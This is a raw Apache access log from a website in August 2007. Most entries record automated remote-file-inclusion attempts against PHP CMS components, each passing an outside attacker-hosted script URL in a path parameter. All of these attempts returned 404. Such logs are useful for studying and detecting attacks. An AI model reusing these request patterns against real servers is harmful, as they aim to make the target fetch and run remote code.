209.211.196.5 - - [19/Aug/2007:18:24:27 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=!scanhttp://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.208.25.198 - - [19/Aug/2007:18:24:36 -0700] "GET /logs/includes/include_once.php?include_file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.208.25.198 - - [19/Aug/2007:18:24:36 -0700] "GET /includes/include_once.php?include_file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.28.49 - - [19/Aug/2007:18:25:02 -0700] "GET /?D=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
209.216.253.180 - - [19/Aug/2007:18:25:04 -0700] "GET /logs/includes/include_once.php?include_file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.253.180 - - [19/Aug/2007:18:25:04 -0700] "GET /includes/include_once.php?include_file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.66.194.5 - - [19/Aug/2007:18:25:49 -0700] "GET /logs/access.log HTTP/1.1" 200 27025 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
74.6.24.220 - - [19/Aug/2007:18:27:14 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
81.168.228.204 - - [19/Aug/2007:18:29:19 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.168.228.204 - - [19/Aug/2007:18:29:20 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:18:29:39 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:18:29:39 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:18:29:40 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:18:30:15 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:18:30:15 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:18:30:15 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
88.84.141.193 - - [19/Aug/2007:18:31:15 -0700] "GET /logs///admin/editor2/spaw_control.class.php?spaw_root=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
88.84.141.193 - - [19/Aug/2007:18:31:16 -0700] "GET ///admin/editor2/spaw_control.class.php?spaw_root=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.232.6 - - [19/Aug/2007:18:31:51 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=!scanhttp://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [19/Aug/2007:18:31:51 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=!scanhttp://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.168.228.204 - - [19/Aug/2007:18:32:46 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.168.228.204 - - [19/Aug/2007:18:32:47 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.10.140.196 - - [19/Aug/2007:18:33:28 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.10.140.196 - - [19/Aug/2007:18:33:29 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
62.193.232.6 - - [19/Aug/2007:18:34:38 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=!scanhttp://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [19/Aug/2007:18:34:39 -0700] "GET /modules/My_eGallery/index.php?basepath=!scanhttp://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:18:35:23 -0700] "GET /logs/template.php?pagina=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:18:35:23 -0700] "GET /template.php?pagina=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
201.130.79.60 - - [19/Aug/2007:18:36:10 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.168.228.204 - - [19/Aug/2007:18:36:55 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.168.228.204 - - [19/Aug/2007:18:36:56 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.160.21.98 - - [19/Aug/2007:18:37:31 -0700] "GET /logs/access_070716.log/includes/include_once.php?include_file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.160.21.98 - - [19/Aug/2007:18:37:31 -0700] "GET /logs/access_070716.log/includes/include_once.php?include_file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.160.21.98 - - [19/Aug/2007:18:37:31 -0700] "GET /logs/access.log/includes/include_once.php?include_file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.160.21.98 - - [19/Aug/2007:18:37:31 -0700] "GET /logs/access.log/includes/include_once.php?include_file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.216.253.180 - - [19/Aug/2007:18:37:59 -0700] "GET /logs/access_070716.log/includes/include_once.php?include_file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
209.216.253.180 - - [19/Aug/2007:18:37:59 -0700] "GET /logs/access.log/includes/include_once.php?include_file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.230.204.130 - - [19/Aug/2007:18:39:27 -0700] "GET /logs/main.php?open=http://portaljhn.iespana.es/r3c4/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
66.230.204.130 - - [19/Aug/2007:18:39:28 -0700] "GET /main.php?open=http://portaljhn.iespana.es/r3c4/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
69.208.25.198 - - [19/Aug/2007:18:40:02 -0700] "GET /logs/access_070716.log/includes/include_once.php?include_file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.208.25.198 - - [19/Aug/2007:18:40:02 -0700] "GET /logs/access.log/includes/include_once.php?include_file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.71.106 - - [19/Aug/2007:18:40:57 -0700] "GET /logs/main.php?open=http://portaljhn.iespana.es/r3c4/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.71.106 - - [19/Aug/2007:18:40:57 -0700] "GET /main.php?open=http://portaljhn.iespana.es/r3c4/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
88.84.141.193 - - [19/Aug/2007:18:42:50 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
88.84.141.193 - - [19/Aug/2007:18:42:50 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.66.194.5 - - [19/Aug/2007:18:45:13 -0700] "GET /logs/access.log HTTP/1.1" 200 35046 "-" "Googlebot-Image/1.0" "www.galf.org"
207.58.169.153 - - [19/Aug/2007:18:49:57 -0700] "GET /logs////components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.169.153 - - [19/Aug/2007:18:49:57 -0700] "GET ////components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.160.230.144 - - [19/Aug/2007:18:51:22 -0700] "GET /logs/index.php?include=http://www.jobos.cz/standardy/konzultanti/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
217.160.230.144 - - [19/Aug/2007:18:51:22 -0700] "GET /index.php?include=http://www.jobos.cz/standardy/konzultanti/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.85.102.18 - - [19/Aug/2007:18:51:58 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.102.18 - - [19/Aug/2007:18:51:58 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.216.162 - - [19/Aug/2007:18:52:35 -0700] "GET /logs/index.php?include=http://jcfec.org/iproject/modules/files/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.216.162 - - [19/Aug/2007:18:52:35 -0700] "GET /index.php?include=http://jcfec.org/iproject/modules/files/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.125.112.244 - - [19/Aug/2007:18:52:55 -0700] "GET //oneadmin/newspublish/include.php?path[docroot]=http://www.otriton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.116.187.16 - - [19/Aug/2007:18:53:59 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.116.187.16 - - [19/Aug/2007:18:54:00 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.130.79.60 - - [19/Aug/2007:18:54:50 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.130.79.60 - - [19/Aug/2007:18:54:50 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:18:55:06 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:18:55:07 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.25.135.171 - - [19/Aug/2007:18:55:09 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.135.171 - - [19/Aug/2007:18:55:09 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.135.171 - - [19/Aug/2007:18:55:09 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.135.171 - - [19/Aug/2007:18:55:09 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.211.196.5 - - [19/Aug/2007:19:00:58 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.211.196.5 - - [19/Aug/2007:19:00:58 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.213.165 - - [19/Aug/2007:19:03:43 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [19/Aug/2007:19:03:44 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
208.66.194.5 - - [19/Aug/2007:19:05:08 -0700] "GET /logs/access.log HTTP/1.1" 200 40119 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
212.241.213.165 - - [19/Aug/2007:19:05:54 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [19/Aug/2007:19:05:55 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
209.211.196.5 - - [19/Aug/2007:19:05:55 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.211.196.5 - - [19/Aug/2007:19:05:55 -0700] "GET /modules/My_eGallery/index.php?basepath=http://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.130.79.60 - - [19/Aug/2007:19:07:29 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
196.205.146.66 - - [19/Aug/2007:19:08:33 -0700] "GET /logs/120http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
196.205.146.66 - - [19/Aug/2007:19:08:34 -0700] "GET /120http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.43.102 - - [19/Aug/2007:19:11:36 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.43.102 - - [19/Aug/2007:19:11:36 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.58.169.153 - - [19/Aug/2007:19:15:17 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.169.153 - - [19/Aug/2007:19:15:17 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.211.196.5 - - [19/Aug/2007:19:15:54 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.211.196.5 - - [19/Aug/2007:19:15:54 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.58.169.153 - - [19/Aug/2007:19:16:44 -0700] "GET /logs////classes/adodbt/sql.php?classes_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.58.169.153 - - [19/Aug/2007:19:16:44 -0700] "GET ////classes/adodbt/sql.php?classes_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:19:16:51 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://coisas.mxbr.com.br/h/rootlab.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:19:16:52 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://coisas.mxbr.com.br/h/rootlab.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.40.192.101 - - [19/Aug/2007:19:19:00 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tools.netfast.org/alat/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.40.192.101 - - [19/Aug/2007:19:19:00 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tools.netfast.org/alat/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.40.192.101 - - [19/Aug/2007:19:20:42 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tools.netfast.org/alat/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.40.192.101 - - [19/Aug/2007:19:20:42 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tools.netfast.org/alat/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:19:22:13 -0700] "GET /logs/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:19:22:13 -0700] "GET /index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.66.194.5 - - [19/Aug/2007:19:25:43 -0700] "GET /logs/access.log HTTP/1.1" 200 45243 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
66.230.204.130 - - [19/Aug/2007:19:27:11 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://portaljhn.iespana.es/r3c4/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [19/Aug/2007:19:27:12 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://portaljhn.iespana.es/r3c4/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
72.232.71.106 - - [19/Aug/2007:19:27:55 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://portaljhn.iespana.es/r3c4/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.71.106 - - [19/Aug/2007:19:27:55 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://portaljhn.iespana.es/r3c4/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.169.153 - - [19/Aug/2007:19:28:35 -0700] "GET /logs/access.log////components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.169.153 - - [19/Aug/2007:19:29:38 -0700] "GET /logs/access_070716.log////components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:19:32:06 -0700] "GET /logs/index.php?inc=http://coisas.mxbr.com.br/h/rootlab.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
195.246.158.53 - - [19/Aug/2007:19:32:06 -0700] "GET /index.php?inc=http://coisas.mxbr.com.br/h/rootlab.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:19:39:50 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:19:39:51 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
196.205.146.66 - - [19/Aug/2007:19:41:08 -0700] "GET /logs/access_070723.log/120http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
196.205.146.66 - - [19/Aug/2007:19:41:09 -0700] "GET /logs/access_070730.log/120http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.211.196.5 - - [19/Aug/2007:19:41:17 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.211.196.5 - - [19/Aug/2007:19:41:18 -0700] "GET /modules/My_eGallery/index.php?basepath=http://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.66.194.5 - - [19/Aug/2007:19:46:26 -0700] "GET /logs/access.log HTTP/1.1" 200 48385 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:19:46:41 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:19:46:41 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:19:46:51 -0700] "GET /logs/index2.php?content=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:19:46:51 -0700] "GET /index2.php?content=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:19:57:03 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:19:57:04 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
